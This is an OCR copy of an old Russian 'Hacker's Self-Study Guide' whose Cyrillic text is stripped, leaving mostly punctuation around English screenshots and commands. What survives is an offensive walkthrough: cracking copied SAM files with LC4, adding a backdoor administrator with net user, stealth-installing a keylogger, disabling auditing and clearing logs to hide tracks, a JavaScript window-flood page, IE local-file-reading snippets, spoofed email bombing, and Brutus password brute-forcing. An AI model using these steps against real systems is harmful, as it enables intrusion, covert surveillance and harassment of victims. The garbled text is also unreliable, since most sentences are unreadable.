Hacker's Self-Study Guide. Detailed
Alex Atsctoy
004.056.53(075.8) 32.973.202-0878-1+32.973.2-018.278-1
Alex Atsctoy. : . . .: [, ] / Alex Atsctoy. .: , 2005. 192 .: . ISBN 5-93673-036-0. CIP
? , , - .
- : www.3st.ru E-mail: [email protected]
, 2005 , 2005 , 2005
1.
, - , , , , . , , . , ( ). !!! , , .. , , 2 () . . , : log: : 1: 2: em: e-mail . , ! . 13.06.1999, .. . !!! , http://www.super-internet-provider.ru , . , - , , , , , , , . , , , Web- .
- , . - , . , , , , , . - , , . - , , , . , , ! , , , . , , . - , 80- , , , , - , . .
, , , , . , , , . ( !), . - (-, !) , , . , , -
, . , , , , , , . , , , , , , - . , . , . , , , , , , , . , , , . , - , , , , . 20- - .
? , , , , , , - , - , , (, - ) , -
. , - , . , , . ( ). , : (, . ). , , , . Hard DISK [ Fdisk.exe] n- ( , ) . ! , , ! [ 24% ] , POWER - ! IDE- . , . , , , - , , , - , HARD DISK - , - , - , . , Must die, . Windows, , . , , . , Windows ? , , - ? , , , , .
, ? 21 ( ). : : , , , , , . , . : , . . , , , . : . . , . . , , . . : , . , ? - , , ? , ? , - . , , , , , ... . , , , (, , ) . , :12
- , 16 19 . ( 80%) , nerd. : 1) , ; 2) . (, ? - ). Windows Unix, TCP/IP , , C++, Perl, Basic. , . - , - 19- . , , , , . , , , . , , -, , . , , , . - , , , . , . , , - , - . . , , , . , . , , .
, , .. , . , , . , -
, , , . , , , , . , , : - .
, . , , , , , , [3]. , , , . , .
" , , , , . - - , . - , , , . , , , .
, , , , . , . , - , . , , , . , , (.. , ). , , , , , , . , , , , ( rootkit - ). - UNIX, Windows 2000 , 4, , , , , Windows, , . . IP-, . - . , - , , -, - , . , 4 - , , .
- , - . - , , . , DoS , IDS. . , .
, - , , . , , . , . ; , . - , , , , , . , , , . , [3] , . , , [3] ! [1]. , ( ). ,
, , - . , , , , , . , . , - , , . , . , , , . - .
. Web- (, RIPE NCC http://www.ripe.net). Web-, Whols, , , . , , , Web-. Yahoo (http://www.yahoo.com), Rambler (http://www.rambler.ru). . , , , , . , , , [3]. Google (http://www.google.com), . , , C:\WINNT, W i n dows NT/2000. - , .
, , Teleport Pro. , Web- , . , , HTML Web- - , , HTTP . , , , , , , , , ( 1 1 ). , Web- - , , . , .
, , , . . -, , , , .. , , . - SAM (Security Account Manager - ), . SAM - , 3 , , LOphtCrack LC4 (http://www.atstake.com). -, , , , Windows , MS Office . , . , 3 . Office Password 3.5 (http://lastbit.com/download.asp) Windows - , , . Revelation SnadBoy (http://www.snadboy.com). , 18
***** - , , - Revelation . , , , , , , . . - ? , , - , - .
Welo - . , Web-, , -. , Web, Web-, Web- , . Web- 5 . , . , Web-, . . , , 6 Death & Destruction Email Bomber - . , . , , , 6 Brutus.19
, , ICQ. - IP- ICQ- ( flood - ) ICQ- , ! - , 7 ICQ Flooder, ICQ-MultiVar, . - , IP- ICQ- ICQ, , . , .
WebWeb- , , , DoS, - . , IIS 5 (Internet Information Server - ) Microsoft . Web- , Web-, HTML . 8 , , CGIScan Brutus, IIS . 9 , DoS. Web- , , Web-. , DoS , - , . Web , , CGI-. , , .
TCP/IP , , , , IP-, , . , . 10 - SuperScan, foundstone_tools (http://www.foundstone.com). W2RK (Windows 2000 Resource Kit - Windows 2000), , W2HK (Windows 2000 Hacker Tools - Windows 2000). , , , .
flepex&am , , . , , - , . , . , , . - . , , , , . - SpyNet, .
, , VPN (Virtual Private Network - ) , , - . , , , , , .
, W2RK ( Windows 2000) W2HK - Windows 2000, . Windows (Explorer) Windows, . , , , password, . [3], , , , . , , , password.txt , ISP. , , . , NTFS Windows 2000/XP, , , PGP Desktop Security.
11~ - , , .. . Web- , (., , http://www.securitylab.ru). 8 IIS. CGIScan , . , 22
- , , IIS 4. Web , . - , , . . , ; , , - ( ). , , - -, , - .
- , . - , . 10 NetBUS, . , . - , , , . . - , , . , , - - , , ... , , .
- , , , , . , , ( ), , ? , , -
, , ? , - ? , , ( ), , , , - . , . . , , , , . , , . , , , , .... , , - Windows 2000/XP.
2.
Windows /Xf Windows 2000 TCSEC (Trusted Computer System Evaluation Criteria - ) . , Windows 2000, , . . . .
.
. , - , , , , , .. , - . , ( log in - ), - , . , , , , . Windows NT/2000/XP SAM (Security Account Manager - ). SAM , , . SAM - , 3 . , . , , , . , -
, , . , , , .., , , , . , , -, (, , ) , , , . , , , , . Windows NT 4 NTLM (NT LAN Manager - NT). NTLM Windows 2000/XP. NTLM, , LM (LAN Manager - ), , Windows NTLM. Windows 2000/XP Kerberos, , , . - Windows 2000/XP, - Windows 2000 Kerberos. - , Windows 2000/XP - . , , , , - .
, , , . - . Windows , , , . , , . , , , , , .
Windows 2000/XP , Windows NT/2000/XP . , . , , . , , . , (Guest), , - (User), . , , , . , (Administrators), , - , , ...
urn, , . , , - , .. , . , , . , , , , , . Windows NT/2000/XP, , , - . , 4, , , . , , , , ,
, , . , 11 , , . , , [2], [6], , - Windows 2000/XP, , .
Windows 2OOO/XP Windows 2000/XP SRM (Security Reference Monitor - ). SRM Windows 2000/XP, .. . Windows 2000/XP , , SRM. . LSA (Local Security Authority - ), , , LSA. , LSA . , LSA , . SAM (Security Account Manager - ), . , LSA. AD (Active Directory - ), AD . , LSA. , , : , , Kerberos; , . , , , : , , 28
Windows 2000/XP , /, . SAM AD , LSA . , , , .. , SRM. , , Windows 2000/XP. , . -, (SAM AD); -, . , .
SAM, , , , . , , , SAM AD, . SAM %%\5132\\5, AD - %KopHeBoft_KaTanor%\ntds\ntds.dit. , , , - ! . , , , , , Windows 2000/XP. SAM Windows NT 4 , NTLM , , , LM, Windows. LM , SAM , , LOphtCrack (http://www.atstacke.com) , . LOphtCrack SAM, , , pwdump (http://www.atstacke.com). Windows - pwdump SAM , LOphtCrack, - , LM - .29
Service Pack 3 Windows NT 4, , Syskey () , SAM. Windows NT 4 Syskey ; Windows 2000/XP Syskey . LM NTLM Syskey , . , - , 3-4 , . , 1 Microsoft, - Microsoft! Windows. , , .
Windows 2000/XP , , , , , ? . , , Windows, SID (Security IDentifier), 48- , . Windows 2000/XP SID, Windows 2000 SID. . , , ? (, ..) Windows ACL (Access Control List - ), (Access Control Entries - ). SID . ACL
Windows 2000/XP , , (Explorer) Windows, Windows 2000/XP. ACL. Windows 2000/XP (, ) LSA , SID 8 , . , , SRM 8 ACL , , . , , - . , , - , . , . - ACL , Windows 2000/XP . , (, http://www.rootkit.com). , ACL ! , - , ? , . , , Windows 2000/XP.
Windows NT 4 , .. , Windows 2000/XP ADS (Active Directory Services). ADS Windows 2000, Windows 2000 Server. , , . - , , , , - ADS , , .. . , , IP- .
ADS , , - , . OU (Organization Units), , , , , , , , OU. OU - , .. OU , OU . Windows 2000/XP , . , . Windows 2000 , - , Windows 2000 Windows NT. , , . Windows 2000/XP , . , , . , .. . , . , domen. : com*!.domen, comp2.domen... , , , , domenl, domen2,... , , . , domenl domen2 , domen2 domenl, domen2 comp1.domen2.domenl, comp2.domen2.domen1, ... compN.domen2.domen1. domenl domen2 , forest, . , domenl compl.domenl.forest, comp2.domen1.forest , domen2 compl.domen2.forest, comp2.domen2.forest, .... .
Windows 2000/XP , - , : . (Universal group), , , . (Global Group), , , . (Local group domain), , . ACL . - . , , AD, , , . - AD SAM, , SAM. AD , AD, , ( 10 ), AD , , , . , . , , , Window 2000, . , , LC4 LOpghtCrack . , , - - .
Windows 2000 Windows 2000 , . - , 332 - 5830
, -, , . -, , , [7], , . - , , - , . . - , - , AD. - - , - -. - , . . -, - . -, , - , , , , . , , , . . - , , , LM, - LM ( , , [3]). Microsoft NTLM ( Service Pack 3 Windows NT 4) NTLMv2 ( Service Pack 4 Windows NT 4). , , Windows 2000 Kerberos, - , . . , Windows 2000/XP Windows , LM. Windows 2000/XP Kerberos, NTLM LM.34
Windows 2000/XP - TCP- 88 , Kerberos, . - LM NTLM, LOphtCrack . , - , . , ?
, , , . , , . , . , , , . , . , , Windows 2000. , Microsoft , , . Windows XP Windows. Windows 2000/XP [7], . , , , . , , Retina, [7].
-, . -, , , VPN (Virtual Private Network - ). VPN , . VPN , . , , , , (Bruce Schneier), (Applied Cryptography), - . , - , , . - , .. .
Windows 2000/XP , . SAM, LSA, SRM, ADS, LM, NTLM, Kerberos . Windows, . Windows 2000/XP, / ADS , Microsoft Press Windows 2000.
3
& Window 2000/XP, , , , , ? , 2, , , , . . ( , - . .) - , . , , , ( - ...). , , . , , , , , , ( - ). ? , - , . - . , . , - , - . , . -, , - - , Windows. , , , , . , , ,
(. 1), - , . - , , , - -. -, , , Windows BIOS . , Windows 2000/XP .
, - (, ). , , - MS-DOS ! - , . -, BIOS , BIOS . . -, BIOS , NTFS, Windows 2000/XP. , MS-DOS - - , - . , -, , ( - - , ! , . , , ), Windows 2000/XP. - NTFSDOS Professional (http://www.winternals.com) Winternals Software LP, NTFS MS-DOS. , , Windows 2000/XP . - , . NTFSDOS Professional - .
1515 fro NTFSDOS Pro . Windows NTFSDOS Professional NTFSDOS Professional Boot Disk Wizard ( NTFSDOS Professional). , NTFS. . , FORMAT/S SYS MS-DOS. Windows XP Create an MS-DOS startup disk ( MS-DOS). > * NTFSDOS Professional (Start Programs NTFSDOS Professional). (. 3.1).
wizard will help you install Windows NT/2000/XP system files needed NTFSDOS Professional to run from a MS-DOS diskette or hard disk
PMC. 3.1. NTFSDOS Pro > Next (). (. 3.2), , . > , Next (), . NTFSDOS Pro MS DOS ( 437). (. 3.3) .
NTFSDOS Professional Boot Disk Wizard copies drivers and system files from an existing Windows NT/2000/XP installation or CD-ROM to your hard disk or a pair of floppy diskettes. If you wish to create bootable diskettes you must add MS-DOS to the diskettes yourself, either before or after using this program. Use the FORMAT/S or SYS commands from a MS-DOS shell to make bootable diskettes. You can also make a bootable diskette on Windows XP by opening My Computer, selecting the "Format" option from the context menu of your diskette drive, and formatting a diskette with the "Create an MS-DOS startup disk" option checked.
. .2.
NTFSDOS Pro uses the character set for the United States version of MS-DOS (code page 437) by default. Select any additional character sets you use with DOS: Japan, code page 932; Korean (Johab), code page 1361; Korean, code page 949; MS-DOS Canadian-French, code page 863; MS-DOS Icelandic, code page 861; MS-DOS Multilingual (Latin I), code page 850; MS-DOS Nordic, code page 865; MS-DOS Portuguese, code page 860; MS-DOS Slavic (Latin II), code page 852.
. .. > Next (). NTFSDOS Pro (. 3.4). Windows NT/2000/XP, NTFSDOS Pro. , , C:\WINNT, \I386 Windows NT/2000/XP, - Service Pack. > Next (). NTFSDOS Pro (. 3.5).40
Pro uses copies of several files located in your Windows NT/2000/XP m directory. Specify the name of your Windows NT/2000/XP installation directory, or a directory containing the required Windows NT/2000 system files. |c\ASFRool
Finish (), . NTFSDOS Pro, . NTFSDOS Pro . , , NTFSPRO.EXE, NTFS . , , MS-DOS , FAT FAT32, NTFSDOS Pro . MS-DOS NTFS, Windows 2000/XP . , ( - ), , , . , - , , , . , , , . - SAM, , , _/132/1'|.
5 SAM, SAM. NTFSDOS Pro, MS-DOS SAM /KOpeHb_CMCTeMbi/system32/config . - , , LC4 - LOphtCrack (http://www.atstake.com). . 3.9 LC4 Import ().
Import menu: Import From Local Machine; Import From Remote Registry...; Import From SAM File...; Import From Sniffer...; Import From .LC File...; Import From .LCS (LC3) File; Import From PWDUMP File...
I File * New Session ( * ). , . 3.9. > Import Import From SAM File ( * SAM). SAM. > SAM, 1-3. > (. 3.10) Session Begin Audit ( ) .44
[Screenshot: @stake LC4 window. Accounts listed: Administrator, ASPNET, Guest, HelpAssistant, IUSR_ALEX-3, IWAM_ALEX-3, NewUser. Status line: Imported 7 accounts.]
Puc. 3.10. SAM , , SAM, . , . 3.11, SAM.
Administrator ASPNET Guest HelpAssistant IUSR_ALEX-3 IWAM_ALEX-3 NewUser
. 3.11. SAM ! , - 007 , , . , , 5 Pentium 2 400 . 45
- , LC4 . LC4 Auditing Options For This Session ( ), . 3.12.Dictionary Crack D Enabled Dictionary List [
The Dictionary Crack tests for passwords that are the same as the words listed in the word file. This test is very fast and finds the weakest passwords.
Dictionary/Brute Hybrid Crack (options: Enabled; Characters to prepend; Characters to append; Common letter substitutions (much slower)). The Dictionary/Brute Hybrid Crack tests for passwords that are variations of the words in the word file. It finds passwords such as "Dana99" or "monkeys!". This test is fast and finds weak passwords.
Brute Force Crack (options: Enabled; Distributed; Character Set: A-Z and 0-9; Custom Character Set). The Brute Force Crack tests for passwords that are made up of the characters specified in the Character Set. It finds passwords such as "WeR3pll6s" or "vC569t12b". This test is slow and finds medium to strong passwords. Specify a character set with more characters to crack stronger passwords.
Puc. 3.12. , LC4 : Dictionary Crack ( ), Dictionary List ( ), . LC4 , , . , , , , , .., . Dictionary/Brute Hybrid Crack (/ ), , / , , . Password???, .
Brute Force Crack ( ), . , . Character Set ( ) , Custom (), Custom Character Set (List each character) ( ( )) . Distributed () . File Save Distributed ( ) . LC4 Windows NT/2000/XP. Windows, Windows 95/98, Pwltool.
' Windows , , . MS Office (http://www.elcomsoft.com), - OfficePassword 3.5. , , ******* Revelation SnadBoy (http://www.snadboy.com). , , AZPR , Passware Kit, http://www.lostpassword.com. Windows - , /, , , Window - OfficePassword .
OfficePassword 3.5 OfficePassword 3.5 Lotus Organizer, MS Project, MS Backup, Symantec Act, Schedule+, MS Money, Quicken, MS Office - Excel, Word, Access, Outlook, ZIP VBA, MS Office. OfficePassword 3.5 . Word password.doc, - ? , Windows, password.doc, (. 3.13). - , OfficePassword 3.5 : > OfficePassword (Start Programs * OfficePassword). OfficePassword (. . 3.14).Password Enter password to open file : \test\password . doc
Puc. 3.13. WordI OfficePassword "DEMO" File Took Option* Help
Selecl documentYou can also diag-and-drop files from Internet Explorer onto this window. > (c) 1998-2001 Vitas Ramanchauskas. LastBit Software Select document ( ) Windows MS Office. , Word . , MS Word . , - OfficePassword 3- .48
- , . > , Select recovery mode ( ), . 3.15.
Select recovery mode. Document path: C:\test\password.doc (Word). Version: Word 8.0+. Internal version: 133. Word language: Russian (0419). Encryption type: Strong. Text size: 537. Preview. Automatic: OfficePassword automatically selects most suitable recovery options. Recovery may take a lot of time (up to several months in case of a long password). About 80% of all passwords could be recovered within 48 hours. Use guaranteed recovery otherwise. User-defined: Adjust settings to optimize search for specific case. (This option is for advanced users only.) Guaranteed recovery: Success is guaranteed! Important: please read the documentation. Additional fee may apply. Click here to learn
Puc. 3.15, > Select recovery mode ( ) : Automatic ( ), , Next (), , . User-defined ( ), . . Guaranteed recovery ( ), , , , . > NextlOlficePasswoid 'DEMO* Password found: '007' (without quotes) The password has been copied onto the clipboard Would you like to open the document now?
Puc. 3.16. !49
(). , , (. 3.16). OfficePassword 3.5 , , . - , . , - , . , , 24-28 , . , , . , , - , .
******, - , , (, ), , ******. , , , . - , , , . , . , -, . , , NetBus . . 3.17 Revelation Snad (http://www.snadboy.com) NetBus NetBus.
[Screenshot: SnadBoy's Revelation. Text of Window Under 'Circled +' Cursor (if available): 007. Status: Revelation active. Length of available text: 3. Also visible: a NetBus host dialog with Destination: SWORD-2000, User name: Administrator, and a Password field.]
How to: 1) Left click and drag (while holding down the left mouse button) the 'circled +'. 2) As you drag the 'circled +' cursor over different fields on various windows, the text in the field under the cursor will be displayed in the 'Text of Window...' box. 3) Release the left mouse button when you have revealed the text you desire. NOTE - If the field contains text hidden by asterisks (or some other character), the actual text will be shown. In some cases the text may actually be asterisks. NOTE - Not all of the fields that the cursor passes over will have text that can be revealed. Check the status light for availability of text. Bright green - text available (see 'Length of text:' in Status area). Bright red - no text available.
Puc. 3.17. NetBus Sword-2000 ! Revelation . 'Circled+'Cursor ('+') SnadBoy's Revelation ( . 3.17 Password ()). Revelation, Test of Window Under Circles and Cursor (if available) ( ( )) ( ). . 3.17, 007 NetBus Sword-2000, ( ). ( NetBus) [11].
- , - , - , , - . : .51
, 4. - , , , . , , , . - , backdoor - , , .
&* , , , , . MS-DOS: NET USER /ADD, , NET LOCALGROUP /ADD, . . 3.18 .r^JCommand Prompt
- NewUser 00 /add |The command completed successfully. C:\>net localgroup fldministrators NewUspr /add I The command completed successfully.
Puc. 3.18. NewUser NewUser , , . , , .
- , . Windows - Startup Document and Settings ( ) , . Startup, All users, . , , . , (), . IKS (Invisible KeyLogger Stealth - ), - http://www.amecisco.com.
- , . - , , . IKS - http://www.amecisco.com, Invisible KeyLogger 97 8 10 , . Windows NT/2000/XP, , , 1^' l+ir^n+l0"8"]. IKS Windows NT/2000/XP. , IKS , . IKS . Web- iks2k20d.exe , . 3.19.
Tabs: Standard Install | Stealth Install | Uninstall
It's recommended that you use Standard Install if this is your first time in using IKS. Just accept the defaults and click on "Install Now" button. Or you can click on "Read readme.M" to get familiar with the concept of IKS first. During a standard installation a program directory will be created; program files will be placed in the directory. An icon to the log file viewer will be placed on the desktop. No file renaming (stealth features) will take place. Install Directory: C:\Program Files\iks. You need to have administrator rights on this system for it to install successfully.
If you want to uninstall in the future, just run this program (iksinstall.exe) again, click on the "Uninstall" tab, then "Uninstall Now" to automatically uninstall the standard installation.
. 3.19. IKS Install Now ( ) - . IKS . , IKS , iks.sys, . , dataview.exe, . 3.20.Settings Help
Filter Out Arrow Keys; Filter Out Ctrl and Alt Keys; Filter Out F1 to F12 Keys; Filter Out All Other Function Keys; Import Binary Log From: ; Use Notepad; Translate to Text Only; Clear Log; Clear Binary Log Upon Exit; Clear Text Log Upon Exit; Save Text Log To: C:\DOCUME~1\ADMINI~1.000\LOCALS
Puc. 3.20.
Go! () , . . 3.20 , , . , IKS , . iks.sys KOpeHb_CHCTeMbi/system32/drivers, ( Regedt32 . 3.21).Registry Editor [HKEY LOCAL MACHINE on Locnl Mnchi Registry Edit Tree View Security Options Window SGemuwa SGpc &I37DRIVER CEJIAS ICQ Groupware COIISADMIN IPMksl CD ILDAP QIMAP4D32 GDIMonitor inetaccs Cllnetln(o Inport Help
Start: REG_DWORD: 0x3 Type: REG_DWORD: 0x1
Puc. 3.21. Windows (, The Cleaner, ). IKS, Stealth Install ( ) (. 3.19) - , calc.sys, (, - - ). IKS . 007 Stealth Monitor, Web-, , , . - Windows, - , , notepad.exe.
, BIOS, . , . , , . , - , , , , ( ), , , . - , , . Windows 2000/XP . Windows 9x/Me, - , PGP Desktop Security, . Windows 9x/Me , . , , , , - ? . .
4.
- , , , . , , , , , - , , , . , , - , , , . , - . 1 , 50% , - , , . , , , . , ,- , , . , ( ). , - ( ). , . , - , , , . .
, , , . , , , - . , privacy - . , , , , , , , . , [10], (, ) , - , - privacy. , , , , , , - , . . , , , , , . , . . -, . , , . , , , - , . -, . . , Web- , Web, . , , ,
(, ).
, , - , , - . , ? , , . : , . , Web-. , - . , . Windows, (Explorer) , . , Windows. , MS Office. , , , . ? , .
. , , (Explorer) , . , (Delete) Windows , , . Windows , , , , , MS Office. , , (Show hidden files and folders) 59
(Folder Options) Windows. * (Tools * Folder Options) (. 4.1).)0 j
: " " ; D 0 0 () Q Q - , / " 004.tmp |~WRL1120.tmp ~WRL19B2.tmp |~WRL3531.tmp
Puc. 4.2. , , - ., .WBK, 60
, ~$. , , , Windows, , , Windows. , - , , . ? , MS Office, , , , Norton Utilities. - Cleaner Disk Security (http://www.theabsolute.net/sware/index.htmlttClndisk).
, , , . , . , , . - , , . ( 100%) . . 4.3 Clean Disk Security 5.01 (http://www.the-absolute.net/sware/ index.html#Clndisk), , ( ). Clean Disk Security 5.01 Erase fully ( ). , , - . 4.3. Clean Disk Security 5.01 ( 61
FAT NTFS). , , . Windows, Windows, Temp ( , , ) . -, , , (cookie). , (. 4.3). . 4.3, : Simple () - 6 , . ; 1 . NIS - 7 (.. ) . Gutmann - 35 (.. ). (Peter Gutmann) . . , ( ). Test mode ( ) - #10 ASCII. . , Clean Disk Security 5.01 , , . , [10]. - , : (UPS); . , , . , .
, , . , , . -, , , . , . , , , Norton Utilities, , / , . , , [10]. ( ) - , , regedt32. . , , NTFS.
, , , - . , - - Web- . , , . . , , .
& , , . . , .
, . (). , , , . ( Web-, , , ), , , , . , , . (., [5], [10], - , , ). , -, . , , , . , -. -, , . . , . , , , . -, - , ! - , , , . , , !!!
Web- , 64
. HTML- Web-. Web- , , Web-, . , , Web- http://www.privacy.net/analyze, , Web- . . 4.4, , Web-, - .3l Analyze Your Internet Privacy - Microsoft Internet Explorer ^ ^ " ^ ^ ^ ^ ~ ^ ^
Your Browser Type and Operating System: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler)
All Information sent by your web browser when requesting this web page:
Accept: */*
Accept-Language: ru
Connection: keep-alive
Host: www.privacy.net
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler)
Cookie: Date=1/30/2002; Privacy.net=Privacy+Analysis
Via: 1.1 cea15. 1.1 proxy.iptelecom.net.ua:3128 (Squid/2.4.STABLE3)
X-Forwarded-For: 212.9.232.151, 212.9.224.89
Cache-Control: max-age=259200
. 4.4. Web- , ( ) Whols, 1, . , - , IP- . Web- Web- , IP- - ...
, , Web-, ( anonymizer - ). , Web-, , . , , http://www.anonymizer.com. (. 4.5).Anonymizer.com -- Onlinu Privacy Sorvic 4- - - 1 | U [ ife-r ^ " hup.//wwwanonymteBf.coin.
. 4.5. Web- Go. - , - FTP-, , , . , , , Web-, , . ( ), .
Web -, - (Proxy server) (. 4.6).
- '" . , D Q 0 - : |www.anonymize| ; J8080 [...!
D - - : : :
. 4.6. - - , , , .. Web- -, . - . - HTTP, FTP-, Web-, FTP. - , . - . - . , , , Web-, , Yahoo. proxy+server+configuration+Explorer, Web-, , -. - , , .
, , , , , , , . , , , 3 IKS. , , NetBus (http://www.netBus.org). , , , , , . : - , ( - ). IP- , -, . , , . , Back Orifice 2000 31337 , , 31336, , , . , Windows NT/2000/XP. , auditpol W2RK, - , , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm). (Event Viewer) Windows 2000/XP. , , (Hidden). Windows, . , . , 68
, , explorer.exe, Windows Windows. , EliteWrap, [11]. ( Rootkit - ). , , . . Tripwire (http://www.tripwiresecurity.com), , Cisco Systems (http://www.cisco.com) . Windows 2000/XP , , , [7].
, , , - , . , / . Windows NT/2000/XP, , auditpol.exe W2RK. ( ) , . :
C:\Auditpol>auditpol \\ComputerName /disable
Running...
Audit information changed successfully on \\ComputerName ...
New audit policy on \\ComputerName ...
(0) Audit Disabled
System                    = No
Logon                     = No
Object Access             = No
Privilege Use             = No
Process Tracking          = Success and Failure
Policy Change             = No
Account Management        = No
Directory Service Access  = No
Account Logon             = No
//ComputerName - , /disable . auditpol.exe - , , , , ( auditpol /? ).
Windows 2000/XP : > (Start) (Settings Control Panel).File Action View Help
Event Viewer [Local] I Type I Description Application Error Record! I Sire 512...
Delete all records n the log
Puc. 4.7. Windows70
(Control Panel) (Administrative Tools). (Event Viewer). Event Viewer ( ) (. 4.7). (Security Log); . Clear all Events ( ). , . 4.8, .
Do you want to save "Security" before clearing it? Yes No Cancel
Puc. 4.8. > (No), . . , - ! , - . , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm). , , Windows NT 4, Windows 2000. . C:\els004>elsave -s \\ComputerName - -s , - . , . elsave /? , . , elsave.exe . - elsave.exe Windows ( (Start), AT MS-DOS). System, .71
- ( , - ). , , . , , , , . - ! 50% ( - !) - ! - , , [9]. , , Norton Personal Firewall, PGP Desktop Security . , , , .
5
# , , , , . , , , , , . , 90- , . , , . , , , . , , , TCP/IP. - , . - , , . , . , , , (, ). , . , , , , Word .., , , , . WWW (World Wide Web - ), Web (). Web - , Web . - 1961 , Web 1992 . , , -
. Web - Web , , Web. Web . Web, Web URL (Uniform Resource Locator - ), Web. , Web HTTP (Hyper Text Transfer Protocol - ). , Web, HTML (Hyper Text Markup Language - ). , , , - HTML CGI HTTP. Web , , Web, , - , , - 1 Web . Web , , Web - HTML Web, ( browser, , , ), Web Web-.
HTML - Web, Web, , , , , , , , , . , HTML , Web, , Internet Explorer (ffi) Netscape Navigator (NN).74
Web : Web - , HTML Web , , , HTML, , - Web? - HTML? . ( ) , , Web-.
, DoS , Web . , , Web, , . open ( ) , JavaScript MainPage.html , HTML 8. 1. 8.1. HTML Web-
<SCRIPT LANGUAGE="JavaScript">
generation();
function generation() {
var d=0;
while (true) {
a = new Date;
d = a.getMilliseconds();
window.open("MainPage.html", d, "width=250, height=250");
HTML, , . Windows 2000/XP IE 5 IE 6 HTML, .
IE 5 IE 6 .
tlep - . , 8.2 ... ( ). 8.2. HTML Web- var p = external.... ; HTML 8.2 IE 5 6 var p 8.2. ( [3], [10]). , , - HTML .
[3] HTML, CLSID. 8.3. HTML, . 8.3. HTML 8.3 IE 6 , . 5.1.
. 5.1. HTML C:\Windows\ system32\calc.exe, , .
Web- , JavaScript, HTML- Web-, . , IFRAME, Web- . 8.4 HTML, , C:\security.txt. 8.4.
Web- _
C:\security.txt
alert (" : \n " +b . document . body . innerText ) ; 77
II.navigate("file://:/Security.txt"); setTimeout('Il.navigate(nfile://C:/Security.txt")',1000); 8.4 IE 5 IE 6 , . 5.2.
. 5.2, security.txt - - Web-. , , , JavaScript . 5.2. Web- . Web- NavigateComplete2, [3].
C:\security.txt
Web-caumo& Web, , , - Web- . , Web- ActiveX, . , , , , , , -, - .. - , , . , - .78
Web - , - Web-, . , , . , Web - . , Windows Web- Microsoft NetBus. Web-, . Web , . 8.7 HTML, -. 8.7. HTML Bubliki&Baranki !!!!! - (Address) , , , , . IE Address Javascript. URL HTML IE 6, ; , IE 6 HTML . ! , , Web- - . , , , .
, , , , Web . . , , , Web. , Web- . . -, , ,
, . . , , . - Web-, - , . : . , , SSL. Web- . . , , , . . , . , , , , . .
Web - . , . , , , , Web . , - Web , , - , , . , , 4 IE Netscape, , 5 6 . , , .82
6.
, , , , , . , . , , . , , , , , ... , - !
- (, , , 1, ). , , , ! , . ? - - - . ( Flood - , ) ( Spam - , . Spam ). (.. ), , , . , -
SMTP-. Death & Destruction Email Bomber ( & ) 4.0, DnD (http://www.softseek.com/Utilities/VBRUN_Files/). , . , DnD, . Avalanche - Avalanche DnD, . . 6.1 DnD 4.O.Death and Desliuclion 4.0 File Clones Header Session Random Lists Mailing Lilts Window Extras Help
-Email Bombing is rarely damaging to the target but is always damaging to smtp hosts. I do NOT condone mailbombing as it causes problems for SysAdmins of servers. I did not make this program for people to blast away at each other. PLEASE use it responsibly, and if you HAVE to email bomb, then please use the option to randomly switch servers in between messages; as it lightens the loads on the server. Have fun and don't ruin a good sysadmins time by flooding his server!
Puc. 6.1. DnD DnD, , 1-1. , ( ). . .84
DnD Settings (), DnD (. . 6.1). DnD Settings () : > SMTP Host ( SMTP) , SMTP-, . SMTP Sword-2000.sword.net. > Spoof Host ( ) , . , . Randomly Change ( ) , SMTP-. > SMTP-, Edit Server List ( ). Random Server List ( ), . 6.2. Random Servei List ^orca.esdIH.w | |mw.highway1.c| |intetconnect.ne| lhorizQns.net stjohns.edu ] Imalasada.lava. | lpressentef.com | |cyberhighway.n| |widQwmaker.co| Iclubmet.mettob | j jcabletegina.co | J |maple.nis.net |
Puc. 6.2. SMTP-
SMTP- Random Server List ( ) . Submit (). Size of Bomb ( ) (. 6.1) : # of messages to send ( ) . 10. Never ending bomb ( ) .
Check the box and then fill in the information that will appear in the headers under that category; or uncheck the box to remove it from the headers. X-Mailer: X-URL: X-Sender: X-Date: | | | |
Puc. 6.5. MIME
13 , DnD , . , , . , Clone () E-Mail bomb ( ) Bomber Spawn 1 ( ), . 6.6.-a Bomber Spawn 1 Sendbombto: Say bomb is from: Message Subject:
Puc. 6.6. 88
, Bomber Spawn 1 ( ) E-Mail bomb ( ) - SMTP-. , SMTP-. - - , ! - . , , ( - ). > , DnD Clones Load Multi Clones ( * ). Number of clones ( ), . 6.7Number of clones How many clones do you want to load?
Puc. 6.7. - ! > Number of clones ( ) ( 5-6) . Bomber Spawn ( ), 1 - . Send Bomb ( ) . - !
&& ! , - , 89
! DnD , , Mailing lists ( ). Subscribe joe lamer to mailing list ( ), . 6.8, , Euro Queer ( ), Mormons (), Family Medicine ( ) - !*i Subscribe joe lamei to a mailing list!
Puc. 6.8. DnD DnD . Target Email Address ( ), Subscribe em () - . , .
, , DnD , , , . , Extras Pword generator ( * ). Randomic Password Generator ( ), . 6.9. , How many characters? ( ?) ( - 8 ) : Use Both ( ) - , Use numbers ( ) - 90
Use letters ( ) - . - , , .* Randomic Passwoid Geneialor
Extras () - . 6.9. SMTP- ( SMTP Remote ( SMTP)), ( Raw Port ( )). , ( , SMTP). Other Tools ( ) . - , , . , - ; . , , . , ( ). , .
. , , - ( IMAP) , . - . Brutus Authentication Engine Test 2 ( Brutas , 2), Brutus AET2 (http://www.hobie.net/brutus). . 6.10 Brutus, , FTP, HTTP, Telnet NetBus.91
Puc. 6.10. Brutus
, Brutus ( 8 Brutus IIS). , alex-1 .sword.net, kolia. , , - , . . > Brutus - 2 (. 6.10) Target () , alex-1.sword.net. > () , . > Connection Options ( ) Use Proxy ( ), - . > Authentication Options ( ) Single User ( ) - .
User file ( ) , .. - kolia. > Pass Mode ( ) Brute Force ( ). Brutus , . 6.11.X Biutus - 2 - www.hoobie.net/biuluit - (January 2000J File Tool. Help Type|POP3 [ | | Start | Slop | Clear | T
Puc. 6.11. Brutus POPS Range (). Range () Brutus - Brute Force Generation (Brutus - ), . 6.12.Biutus - Biule Foice Generation Digits only Lowercase Alpha Uppercase Alpha Mixed Alpha Alphanumeric Full Keyspace Custom Range |etaoinsrhldcumfpgwybvkxjqzl 234567890! | Min Length [ Max Length [4 [T Cancel
Puc. 6.12.
